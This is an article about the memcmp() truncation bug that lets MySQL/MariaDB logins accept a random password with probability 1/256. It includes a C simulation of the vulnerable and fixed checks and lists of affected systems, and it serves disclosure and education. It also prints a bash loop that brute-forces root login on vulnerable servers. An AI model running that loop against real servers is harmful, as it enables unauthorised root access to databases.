Funny vulnerability in MySQL under Linux 64-bit

On Saturday, MariaDB project security coordinator Sergei Golubchik (petropavel) announced an interesting vulnerability in MySQL and MariaDB in versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22.

The gist is this: when a MariaDB/MySQL user connects, a token (a SHA value computed from the password and a hash) is calculated and compared with the expected value. The code assumes that the result of memcmp() fits into the range -128..127, but on some platforms (apparently glibc on Linux with SSE optimizations) the return value can fall outside that range.

As a result, in 1 case out of 256 the comparison of the computed hash with the expected value reports a match regardless of the actual hash. In other words, the system accepts a random password with a probability of 1/256.
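To make the failure mode concrete, here is an added C example (not code from the article or from the MySQL/MariaDB source) that reproduces the bug pattern with a constructed comparison routine. `wide_memcmp()` is a stand-in that deliberately returns differences outside -128..127, simulating the platform behaviour described above; `my_bool` and the `check_scramble_*` names are my own labels for the one-byte return type and the three variants of the check. The "vulnerable" variant returns the raw `int` through a one-byte type, so a result such as -256 is truncated to 0, which the caller reads as "hashes match". The "fixed" variant normalises the result to 0/1 before it is narrowed, and the constant-time variant removes the dependency on the libc's `memcmp()` return range altogether.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define HASH_SIZE 20           /* length of the stage-2 SHA hash compared at login */

typedef char my_bool;          /* one-byte boolean: can only hold -128..127 */

/*
 * Constructed stand-in for a memcmp() whose result is NOT confined to
 * -128..127: it returns the difference of the first mismatching bytes
 * multiplied by 256. This simulates the out-of-range return values the
 * article attributes to some optimised libc builds; it is not glibc code.
 */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *pa = a, *pb = b;
    for (size_t i = 0; i < n; i++) {
        if (pa[i] != pb[i])
            return ((int)pa[i] - (int)pb[i]) * 256;
    }
    return 0;
}

/*
 * Vulnerable pattern: the int result is returned through a one-byte type.
 * Any result that is a multiple of 256 is truncated to 0, and 0 means
 * "hashes are equal", so a wrong password is accepted.
 */
static my_bool check_scramble_vulnerable(const uint8_t *stored, const uint8_t *computed)
{
    return wide_memcmp(stored, computed, HASH_SIZE);
}

/* Fixed pattern: collapse the result to 0/1 while it is still an int. */
static my_bool check_scramble_fixed(const uint8_t *stored, const uint8_t *computed)
{
    return wide_memcmp(stored, computed, HASH_SIZE) != 0;
}

/*
 * Defensive pattern: a constant-time comparison that never depends on the
 * libc's memcmp() return range and does not reveal where the hashes differ.
 */
static my_bool check_scramble_ct(const uint8_t *stored, const uint8_t *computed)
{
    unsigned char diff = 0;
    for (size_t i = 0; i < HASH_SIZE; i++)
        diff |= (unsigned char)(stored[i] ^ computed[i]);
    return diff != 0;
}

typedef my_bool (*check_fn)(const uint8_t *, const uint8_t *);

/* Returns 1 if `check` accepts a hash that is wrong in its first byte, 0 otherwise. */
static int wrong_hash_accepted(check_fn check)
{
    uint8_t stored[HASH_SIZE], candidate[HASH_SIZE];
    memset(stored, 0x5a, HASH_SIZE);        /* constructed sample "stored" hash */
    memcpy(candidate, stored, HASH_SIZE);
    candidate[0] ^= 0x01;                   /* wrong hash: one byte off by 1 -> wide_memcmp gives -256 */
    return check(stored, candidate) == 0;   /* 0 from the check means "match" */
}

/* Returns 1 if `check` accepts the correct hash (it always should), 0 otherwise. */
static int right_hash_accepted(check_fn check)
{
    uint8_t stored[HASH_SIZE];
    memset(stored, 0x5a, HASH_SIZE);        /* same constructed sample hash on both sides */
    return check(stored, stored) == 0;
}

int main(void)
{
    printf("vulnerable: wrong hash accepted = %d, right hash accepted = %d\n",
           wrong_hash_accepted(check_scramble_vulnerable), right_hash_accepted(check_scramble_vulnerable));
    printf("fixed:      wrong hash accepted = %d, right hash accepted = %d\n",
           wrong_hash_accepted(check_scramble_fixed), right_hash_accepted(check_scramble_fixed));
    printf("const-time: wrong hash accepted = %d, right hash accepted = %d\n",
           wrong_hash_accepted(check_scramble_ct), right_hash_accepted(check_scramble_ct));
    return 0;
}
```

The simulation forces the out-of-range case on every mismatch so the truncation is easy to see; on an affected real system it only happens for some fraction of hash pairs, which is where the 1/256 figure comes from. The lesson for reviewers is the same either way: `memcmp()` is specified to return a negative, zero or positive `int`, never a value in a particular range, so its result must be tested (`!= 0`) before being stored in a narrower type.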

As a result, a simple bash command gives an attacker root access to a vulnerable MySQL server, even without knowing the password.

    $ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
    mysql>

Currently, the vulnerability is unofficially confirmed in the following configurations:

Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
Debian Linux 64-bit (it is not yet clear in which specific versions)
Arch Linux (the same)
Fedora 16 (64-bit)

Users also report configurations in which the vulnerability does not appear to occur:

Official MySQL and MariaDB builds (including Windows)
Red Hat Enterprise Linux, CentOS (32-bit and 64-bit)
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, probably all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.0.51a-24+lenny5
Debian Linux lenny 64-bit 5.1.51-1-log
Debian Linux squeeze 64-bit 5.1.49-3-log
Debian Linux squeeze 32-bit 5.1.61-0+squeeze1
Debian Linux squeeze 64-bit 5.1.61-0+squeeze1

There is no definitive list of vulnerable and unaffected systems yet.

Joshua Drake of Accuvant Labs has published a program to check whether a server is vulnerable.
